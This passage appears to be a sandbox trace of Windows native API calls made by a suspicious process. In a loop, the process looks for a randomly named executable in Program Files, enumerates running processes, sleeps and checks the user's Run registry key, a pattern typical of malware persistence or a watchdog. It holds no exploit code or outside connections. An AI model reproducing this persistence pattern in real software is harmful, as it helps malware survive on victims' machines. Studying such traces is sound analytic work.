DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.717] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0303.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.717] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.717] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0303.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0303.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0303.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0303.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.879] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0303.880] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0303.881] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0303.881] NtClose (Handle=0x338) returned 0x0 [0303.881] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.881] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.882] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0303.882] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.882] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.882] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0303.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0303.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0303.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0303.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.016] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.018] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.018] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.018] NtClose (Handle=0x338) returned 0x0 [0304.018] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.018] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.019] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0304.019] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.019] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.019] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0304.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.137] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.139] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.141] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.141] NtClose (Handle=0x338) returned 0x0 [0304.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.141] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.141] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0304.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.141] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.141] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0304.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.290] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.292] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.293] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.293] NtClose (Handle=0x338) returned 0x0 [0304.293] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.293] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.294] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0304.294] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.294] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.294] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0304.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.468] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.469] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.469] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.469] NtClose (Handle=0x338) returned 0x0 [0304.470] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.470] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.470] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0304.470] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.470] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.470] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0304.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.605] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.607] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.608] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.608] NtClose (Handle=0x338) returned 0x0 [0304.608] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.608] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.608] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0304.608] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.608] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.609] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0304.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 